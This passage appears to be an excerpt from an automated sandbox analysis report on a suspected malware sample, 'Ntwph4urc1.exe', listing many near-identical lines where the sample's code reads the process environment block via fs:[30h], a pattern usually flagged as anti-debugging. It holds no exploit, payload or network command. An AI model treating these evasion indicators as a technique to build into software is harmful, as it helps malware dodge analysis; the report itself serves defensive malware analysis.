      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h] 9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369592C5 mov eax, dword ptr fs:[00000030h]9_2_369592C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369592C5 mov eax, dword ptr fs:[00000030h]9_2_369592C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F2F8 mov eax, dword ptr fs:[00000030h]9_2_36A0F2F8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369492FF mov eax, dword ptr fs:[00000030h]9_2_369492FF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB2F0 mov eax, dword ptr fs:[00000030h]9_2_369FB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB2F0 mov eax, dword ptr fs:[00000030h]9_2_369FB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25227 mov eax, dword ptr fs:[00000030h]9_2_36A25227
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987208 mov eax, dword ptr fs:[00000030h]9_2_36987208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987208 mov eax, dword ptr fs:[00000030h]9_2_36987208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1D26B mov eax, dword ptr fs:[00000030h]9_2_36A1D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1D26B mov eax, dword ptr fs:[00000030h]9_2_36A1D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD250 mov ecx, dword ptr fs:[00000030h]9_2_369DD250
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949240 mov eax, dword ptr fs:[00000030h]9_2_36949240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949240 mov eax, dword ptr fs:[00000030h]9_2_36949240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698724D mov eax, dword ptr fs:[00000030h]9_2_3698724D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36979274 mov eax, dword ptr fs:[00000030h]9_2_36979274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36991270 mov eax, dword ptr fs:[00000030h]9_2_36991270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36991270 mov eax, dword ptr fs:[00000030h]9_2_36991270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B256 mov eax, dword ptr fs:[00000030h]9_2_36A0B256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B256 mov eax, dword ptr fs:[00000030h]9_2_36A0B256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A739A mov eax, dword ptr fs:[00000030h]9_2_369A739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A739A mov eax, dword ptr fs:[00000030h]9_2_369A739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369733A5 mov eax, dword ptr fs:[00000030h]9_2_369733A5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369833A0 mov eax, dword ptr fs:[00000030h]9_2_369833A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369833A0 mov eax, dword ptr fs:[00000030h]9_2_369833A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2539D mov eax, dword ptr fs:[00000030h]9_2_36A2539D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F3E6 mov eax, dword ptr fs:[00000030h]9_2_36A0F3E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A253FC mov eax, dword ptr fs:[00000030h]9_2_36A253FC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B3D0 mov ecx, dword ptr fs:[00000030h]9_2_36A0B3D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1132D mov eax, dword ptr fs:[00000030h]9_2_36A1132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1132D mov eax, dword ptr fs:[00000030h]9_2_36A1132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36947330 mov eax, dword ptr fs:[00000030h]9_2_36947330
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F32A mov eax, dword ptr fs:[00000030h]9_2_3697F32A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949353 mov eax, dword ptr fs:[00000030h]9_2_36949353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949353 mov eax, dword ptr fs:[00000030h]9_2_36949353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F367 mov eax, dword ptr fs:[00000030h]9_2_36A0F367
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D34C mov eax, dword ptr fs:[00000030h]9_2_3694D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D34C mov eax, dword ptr fs:[00000030h]9_2_3694D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25341 mov eax, dword ptr fs:[00000030h]9_2_36A25341
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F3370 mov eax, dword ptr fs:[00000030h]9_2_369F3370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36955096 mov eax, dword ptr fs:[00000030h]9_2_36955096
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698909C mov eax, dword ptr fs:[00000030h]9_2_3698909C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D090 mov eax, dword ptr fs:[00000030h]9_2_3697D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D090 mov eax, dword ptr fs:[00000030h]9_2_3697D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D08D mov eax, dword ptr fs:[00000030h]9_2_3694D08D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD080 mov eax, dword ptr fs:[00000030h]9_2_369DD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD080 mov eax, dword ptr fs:[00000030h]9_2_369DD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369790DB mov eax, dword ptr fs:[00000030h]9_2_369790DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD0C0 mov eax, dword ptr fs:[00000030h]9_2_369CD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD0C0 mov eax, dword ptr fs:[00000030h]9_2_369CD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369750E4 mov eax, dword ptr fs:[00000030h]9_2_369750E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369750E4 mov ecx, dword ptr fs:[00000030h]9_2_369750E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A250D9 mov eax, dword ptr fs:[00000030h]9_2_36A250D9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F705E mov ebx, dword ptr fs:[00000030h]9_2_369F705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F705E mov eax, dword ptr fs:[00000030h]9_2_369F705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25060 mov eax, dword ptr fs:[00000030h]9_2_36A25060
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B052 mov eax, dword ptr fs:[00000030h]9_2_3697B052
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov ecx, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961070 mov eax, dword ptr fs:[00000030h]9_2_36961070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD070 mov ecx, dword ptr fs:[00000030h]9_2_369CD070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D106E mov eax, dword ptr fs:[00000030h]9_2_369D106E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A011A4 mov eax, dword ptr fs:[00000030h]9_2_36A011A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A7190 mov eax, dword ptr fs:[00000030h]9_2_369A7190
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696B1B0 mov eax, dword ptr fs:[00000030h]9_2_3696B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D1D0 mov eax, dword ptr fs:[00000030h]9_2_3698D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D1D0 mov ecx, dword ptr fs:[00000030h]9_2_3698D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F71F9 mov esi, dword ptr fs:[00000030h]9_2_369F71F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A251CB mov eax, dword ptr fs:[00000030h]9_2_36A251CB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369551ED mov eax, dword ptr fs:[00000030h]9_2_369551ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369751EF mov eax, dword ptr fs:[00000030h]9_2_369751EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B136 mov eax, dword ptr fs:[00000030h]9_2_3694B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951131 mov eax, dword ptr fs:[00000030h]9_2_36951131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951131 mov eax, dword ptr fs:[00000030h]9_2_36951131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957152 mov eax, dword ptr fs:[00000030h]9_2_36957152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949148 mov eax, dword ptr fs:[00000030h]9_2_36949148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E3140 mov eax, dword ptr fs:[00000030h]9_2_369E3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F172 mov eax, dword ptr fs:[00000030h]9_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E9179 mov eax, dword ptr fs:[00000030h]9_2_369E9179
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25152 mov eax, dword ptr fs:[00000030h]9_2_36A25152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957E96 mov eax, dword ptr fs:[00000030h]9_2_36957E96
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DDE9B mov eax, dword ptr fs:[00000030h]9_2_369DDE9B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0DEB0 mov eax, dword ptr fs:[00000030h]9_2_36A0DEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983E8F mov eax, dword ptr fs:[00000030h]9_2_36983E8F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov ecx, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDEB0 mov eax, dword ptr fs:[00000030h]9_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DEA5 mov eax, dword ptr fs:[00000030h]9_2_3694DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DEA5 mov ecx, dword ptr fs:[00000030h]9_2_3694DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694FEA0 mov eax, dword ptr fs:[00000030h]9_2_3694FEA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DDEAA mov eax, dword ptr fs:[00000030h]9_2_369DDEAA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1BEE6 mov eax, dword ptr fs:[00000030h]9_2_36A1BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BEC0 mov eax, dword ptr fs:[00000030h]9_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694BEC0 mov eax, dword ptr fs:[00000030h]9_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
